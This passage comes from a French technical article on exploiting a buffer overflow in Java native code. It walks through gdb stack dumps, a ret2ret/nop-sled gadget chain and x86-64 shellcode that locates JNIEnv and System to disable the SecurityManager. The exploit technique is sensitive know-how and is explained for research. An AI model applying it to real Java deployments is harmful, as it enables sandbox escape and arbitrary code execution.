l’état de la pile avant la copie du tableau.</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4847248770839" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) x/80gx $rsp
0x7fae2588a668: 0x00007f453eaaab85 0x0000000000000000 // (1) …a668 = pointé par rsp
0x7fae2588a678: 0x00007f453eaad2fe 0x00000000000005c8
0x7fae2588a688: 0x0000000000000000 0x0000000000000000
[…]
0x7fae2588a7f8: 0x00007f4588140190 0x00007f45881341e0
0x7fae2588a808: 0x00007f4588140190 0x00007f453ebc5308 // (3) …a800 = destination
0x7fae2588a818: 0x00007f453eab1036 0x00007f453e660020
[…]
0x7fae2588a858: 0x00007f453ebccdb0 0x0000000000304000
0x7fae2588a868: 0x00007f453eabf2cd 0x00007f44fda8f7c0
0x7fae2588a878: 0x00007fae2588a898 0x0000000400305b30 // (2) …a778 = candidat potentiel
[…]</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4847248770839-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4847248770839-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4847248770839-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4847248770839-4">4</div><div class="crayon-num" data-line="crayon-5997722bc4847248770839-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4847248770839-6">6</div><div class="crayon-num" data-line="crayon-5997722bc4847248770839-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4847248770839-8">8</div><div class="crayon-num" data-line="crayon-5997722bc4847248770839-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4847248770839-10">10</div><div class="crayon-num" data-line="crayon-5997722bc4847248770839-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4847248770839-12">12</div><div class="crayon-num" data-line="crayon-5997722bc4847248770839-13">13</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4847248770839-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">x</span><span class="crayon-o">/</span><span class="crayon-cn">80gx</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-i">rsp</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4847248770839-2"><span class="crayon-cn">0x7fae2588a668</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f453eaaab85</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span><span class="crayon-h"> </span><span class="crayon-c">// (1) …a668 = pointé par rsp</span></div><div class="crayon-line" id="crayon-5997722bc4847248770839-3"><span class="crayon-cn">0x7fae2588a678</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f453eaad2fe</span><span class="crayon-h"> </span><span class="crayon-cn">0x00000000000005c8</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4847248770839-4"><span class="crayon-cn">0x7fae2588a688</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span></div><div class="crayon-line" id="crayon-5997722bc4847248770839-5"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4847248770839-6"><span class="crayon-cn">0x7fae2588a7f8</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f4588140190</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f45881341e0</span></div><div class="crayon-line" id="crayon-5997722bc4847248770839-7"><span class="crayon-cn">0x7fae2588a808</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f4588140190</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f453ebc5308</span><span class="crayon-h"> </span><span class="crayon-c">// (3) …a800 = destination</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4847248770839-8"><span class="crayon-cn">0x7fae2588a818</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f453eab1036</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f453e660020</span></div><div class="crayon-line" id="crayon-5997722bc4847248770839-9"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4847248770839-10"><span class="crayon-cn">0x7fae2588a858</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f453ebccdb0</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000304000</span></div><div class="crayon-line" id="crayon-5997722bc4847248770839-11"><span class="crayon-cn">0x7fae2588a868</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f453eabf2cd</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f44fda8f7c0</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4847248770839-12"><span class="crayon-cn">0x7fae2588a878</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007fae2588a898</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000400305b30</span><span class="crayon-h"> </span><span class="crayon-c">// (2) …a778 = candidat potentiel</span></div><div class="crayon-line" id="crayon-5997722bc4847248770839-13"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0023 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Un candidat très intéressant est l’adresse <span style="color: #ff0000;"><b>0x00007fae2588a898</b></span>. En utilisant le débordement de tampon, nous pouvons écraser le dernier octet de l’adresse (les adresses sont représentées en petit-boutiste (little-endian), donc il est possible d’écraser uniquement les deux octets de poids faible sans changer le reste de l’adresse). Nous avons donc l’adresse <span style="color: #ff0000;"><b>0x00007fae2588a800</b></span> qui pointe quelque part où l’on contrôle les valeurs dans la pile. Il reste à trouver comment atteindre cette adresse éloignée de <span style="color: #ff0000;"><b>rsp</b></span> qui pointe vers l’adresse <span style="color: #ff0000;"><b>0x7fae2588a668</b></span>. Une technique, appelée <span style="color: #ff0000;"><b>ret2ret</b></span> <b>[6]</b> consiste à remplacer toutes les adresses de la pile avec l’adresse d’un gadget qui ne fera qu’un <span style="color: #ff0000;"><b>ret</b></span> (voir Figure 3 à gauche). Notez que pour trouver les gadgets nous utilisons la même astuce que dans la section précédente : comme le binaire Java n’est pas compilé en PIE, son adresse en mémoire est toujours la même malgré ASLR, ce qui nous permet de l’utiliser pour trouver les gadgets nécessaires. Ce gruyère d’adresses vers des <span style="color: #ff0000;"><b>rets</b></span> posera problème, car notre adresse modifiée pointera vers ledit gruyère : il y aura probablement un plantage du programme ! Ce qu’il nous faut c’est un emmental d’adresses vers des gadgets qui vont incrémenter <span style="color: #ff0000;"><b>rsp</b></span> pour former les trous vers lesquels <span style="color: #ff0000;"><b>0x00007fae2588a800</b></span> pointera. Nous remplirons chaque trou avec un toboggan de <span style="color: #ff0000;"><b>nop</b></span> (<i>nod sled</i>) suivi d’un <span style="color: #ff0000;"><b>jmp</b></span> vers le début de notre shellcode. Cette seconde approche est illustrée Figure 3 à droite.</span></p>
<div id="attachment_633" style="width: 310px" class="wp-caption alignnone"><a href="http://www.miscmag.com/wp-content/uploads/2017/08/figure_piles.png"><img class="wp-image-633 size-medium" src="http://www.miscmag.com/wp-content/uploads/2017/08/figure_piles-300x169.png" alt="" width="300" height="169" srcset="http://www.miscmag.com/wp-content/uploads/2017/08/figure_piles-300x169.png 300w, http://www.miscmag.com/wp-content/uploads/2017/08/figure_piles-768x434.png 768w, http://www.miscmag.com/wp-content/uploads/2017/08/figure_piles-1024x579.png 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a><p class="wp-caption-text"><span style="font-family: Verdana, Geneva; display: inline-block; padding: 5px; margin: 0px 2px;">Fig. 3 : La pile de type ret2ret avec uniquement des adresses vers un gadget ret (gauche) et la pile avec des adresses vers des gadgets incrémentant le pointeur de pile rsp, les toboggans de nop et les jmps vers le shellcode (à droite).</span></p></div>
<p>&nbsp;</p>
<p><span style="font-size: 11px; display: inline-block; border: 1px solid #ff0000; border-radius: 0px; padding: 5px; margin: 0px 2px;"><em>Le lecteur attentif se demandera sans doute pourquoi l’astuce de la section 3 consistant à sauter à l’adresse d’</em><span style="color: #ff0000;"><b>ebx</b></span><em>, ne fonctionne pas ici. Et il aura raison ! Il est probablement possible d’utiliser cette technique avec un </em><span style="color: #ff0000;"><b>jmp</b></span><em> vers le registre </em><span style="color: #ff0000;"><b>rsp</b></span><em>+ un offset. L’objectif dans cette section est de montrer une autre approche.</em></span></p>
<h2 class="western">4.2 Désactivation du SecurityManager</h2>
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Nous sommes maintenant capables d’exécuter notre shellcode. Comme expliqué dans la section 1, aucune vérification de permission n’est effectuée au niveau du code natif. Donc, nous pourrions nous arrêter ici, car nous pouvons déjà exécuter du code avec les droits du processus de la machine virtuelle Java. Cependant, il peut être intéressant de considérer un shellcode qui ira uniquement désactiver le <span style="color: #ff0000;"><b>SecurityManager</b></span>. Cela a plusieurs avantages. Premièrement, le nombre d’instructions en assembleur est faible (une dizaine), ce qui facilitera le portage vers une autre architecture. Deuxièmement, le code de l’analyste peut être directement écrit en Java, langage multiplateforme, ce qui permettra de le réutiliser directement pour différents couples architecture/système d’exploitation.</span></p>
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Le <span style="color: #ff0000;"><b>SecurityManager</b></span> est référencé par un champ privé de la classe <span style="color: #ff0000;"><b>System</b></span>. Pour récupérer la classe <span style="color: #ff0000;"><b>System</b></span>, nous allons utiliser la fonction <span style="color: #ff0000;"><b>FindClass</b></span> de la structure <span style="color: #ff0000;"><b>JNIEnv</b></span>. Cette fonction nous retournera un pointeur vers la classe <span style="color: #ff0000;"><b>System</b></span>. Le code C ressemble à cela :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4851966500279" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
jclass systemCls = (*env)-&gt;FindClass(env, "java/lang/System");</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4851966500279-1">1</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4851966500279-1"><span class="crayon-e">jclass </span><span class="crayon-v">systemCls</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-o">*</span><span class="crayon-v">env</span><span class="crayon-sy">)</span><span class="crayon-o">-&gt;</span><span class="crayon-e">FindClass</span><span class="crayon-sy">(</span><span class="crayon-v">env</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-s">"java/lang/System"</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0007 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Pour appeler <span style="color: #ff0000;"><b>FindClass</b></span>, il nous faut un pointeur vers un <span style="color: #ff0000;"><b>JNIEnv</b></span>. Où le trouver ? En mettant un breakpoint dans la première fonction native (<span style="color: #ff0000;"><b>runNative</b></span>, voir la trace d’appels de la section 3), nous regardons la valeur de <span style="color: #ff0000;"><b>rsi</b></span> qui n’est autre que l’adresse de <span style="color: #ff0000;"><b>JNIEnv</b></span><b> </b>: <span style="color: #ff0000;"><b>0x7f648c140190</b></span> (en 64 bits/Linux le premier paramètre est passé via <span style="color: #ff0000;"><b>rsi</b></span>). Regardons ensuite dans la pile, après le débordement du tampon et le saut vers notre shellcode, pour trouver une valeur similaire :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4856618611437" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) x/80gx rsp
[…]
0x7fae2588a9c8: 0x00007f6493b07bfd 0x00007f6400000001
0x7fae2588a9d8: 0x00007f648c140000 0x00007f644026fa30 // ...09d8 = adresse proche</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4856618611437-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4856618611437-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4856618611437-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4856618611437-4">4</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4856618611437-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">x</span><span class="crayon-o">/</span><span class="crayon-cn">80gx</span><span class="crayon-h"> </span><span class="crayon-i">rsp</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4856618611437-2"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div><div class="crayon-line" id="crayon-5997722bc4856618611437-3"><span class="crayon-cn">0x7fae2588a9c8</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6493b07bfd</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6400000001</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4856618611437-4"><span class="crayon-cn">0x7fae2588a9d8</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f648c140000</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f644026fa30</span><span class="crayon-h"> </span><span class="crayon-c">// ...09d8 = adresse proche</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0009 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">L’adresse de <span style="color: #ff0000;"><b>JNIEnv</b></span> est donc <span style="color: #ff0000;"><b>0x00007f648c140000</b></span> plus <span style="color: #ff0000;"><b>0x190</b></span>. Le code assembleur de notre shellcode pour récupérer l’adresse de la classe System est :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc485b874836593" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
0 : mov 0x721(%rip),%rdi # récupération de l’adresse proche de JNIEnv
1 : add $0x190,%rdi # ajout de l’offset pour avoir le pointeur vers JNIEnv
2 : lea 0x72(%rip),%rsi # récupération de l’adresse de ‘’java/lang/System’’
3 : mov %rdi,%rax # copie le pointeur vers JNIEnv dans rax
4 : mov (%rax),%rax # copie l’adresse vers la structure des pointeurs de fonctions
5 : mov 0x30(%rax),%rax # copie l’adresse de la fonction FindClass dans rax
6 : callq *%rax # appelle FindClass(rdi, rsi)
7 : mov (%rax),%rbx # copie l’adresse du pointeur vers la classe System dans rbx</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc485b874836593-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc485b874836593-2">2</div><div class="crayon-num" data-line="crayon-5997722bc485b874836593-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc485b874836593-4">4</div><div class="crayon-num" data-line="crayon-5997722bc485b874836593-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc485b874836593-6">6</div><div class="crayon-num" data-line="crayon-5997722bc485b874836593-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc485b874836593-8">8</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc485b874836593-1"><span class="crayon-cn">0</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">mov</span><span class="crayon-h"> </span><span class="crayon-cn">0x721</span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rip</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rdi</span><span class="crayon-h"> </span><span class="crayon-p"># récupération de l’adresse proche de JNIEnv</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc485b874836593-2"><span class="crayon-cn">1</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">add</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-cn">0x190</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rdi</span><span class="crayon-h"> </span><span class="crayon-p"># ajout de l’offset pour avoir le pointeur vers JNIEnv</span></div><div class="crayon-line" id="crayon-5997722bc485b874836593-3"><span class="crayon-cn">2</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">lea</span><span class="crayon-h"> </span><span class="crayon-cn">0x72</span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rip</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rsi</span><span class="crayon-h"> </span><span class="crayon-p"># récupération de l’adresse de ‘’java/lang/System’’</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc485b874836593-4"><span class="crayon-cn">3</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">mov</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">rdi</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-h"> </span><span class="crayon-p"># copie le pointeur vers JNIEnv dans rax</span></div><div class="crayon-line" id="crayon-5997722bc485b874836593-5"><span class="crayon-cn">4</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-e">mov</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-h"> </span><span class="crayon-p"># copie l’adresse vers la structure des pointeurs de fonctions</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc485b874836593-6"><span class="crayon-cn">5</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">mov</span><span class="crayon-h"> </span><span class="crayon-cn">0x30</span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-h"> </span><span class="crayon-p"># copie l’adresse de la fonction FindClass dans rax</span></div><div class="crayon-line" id="crayon-5997722bc485b874836593-7"><span class="crayon-cn">6</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-e ">callq *</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-h"> </span><span class="crayon-p"># appelle FindClass(rdi, rsi)</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc485b874836593-8"><span class="crayon-cn">7</span> <span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-e">mov</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rbx</span><span class="crayon-h"> </span><span class="crayon-p"># copie l’adresse du pointeur vers la classe System dans rbx</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0029 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Nous avons donc maintenant dans <span style="color: #ff0000;"><b>rbx</b></span><b> </b>l’adresse <span style="color: #ff0000;"><b>0x7f6443c2ec90</b></span> qui pointe vers la classe <span style="color: #ff0000;"><b>System</b></span>. Il ne reste plus qu’à initialiser le champ contenant le pointeur vers le <span style="color: #ff0000;"><b>SecurityManager</b></span> à zéro (<span style="color: #ff0000;"><b>null</b></span>). Pour ce faire, nous allons exécuter un bout de code Java avec <span style="color: #ff0000;"><b>sun.misc.Unsafe</b></span><b> </b>pour connaître l’adresse du <span style="color: #ff0000;"><b>SecurityManager</b></span><b> </b>: c’est <span style="color: #ff0000;"><b>0x7f6473af9870</b></span>. Essayons de retrouver <span style="color: #ff0000;"><b>0x7f6473af9870</b></span> en mémoire. Dans l’implémentation de la machine virtuelle d’OpenJDK, les champs statiques d’une classe Java se trouvent juste au-dessus de la classe, c’est-à-dire à des adresses mémoire plus petites que l’adresse de la classe.</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4861485073699" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) x/30gx 0x7f6443c2ec70
0x7f6443c2ec70: 0x00007f6473ac6298 0x00007f6473af9870
0x7f6443c2ec80: 0x0000000000000000 0x00007f6473ab13a0
0x7f6443c2ec90: 0x000000267436d001 0x00007f6443c1fbb8
0x7f6443c2eca0: 0x00007f6443c2ea28 0x0000000000000000
[…]</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4861485073699-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4861485073699-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4861485073699-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4861485073699-4">4</div><div class="crayon-num" data-line="crayon-5997722bc4861485073699-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4861485073699-6">6</div></div>
				</td>
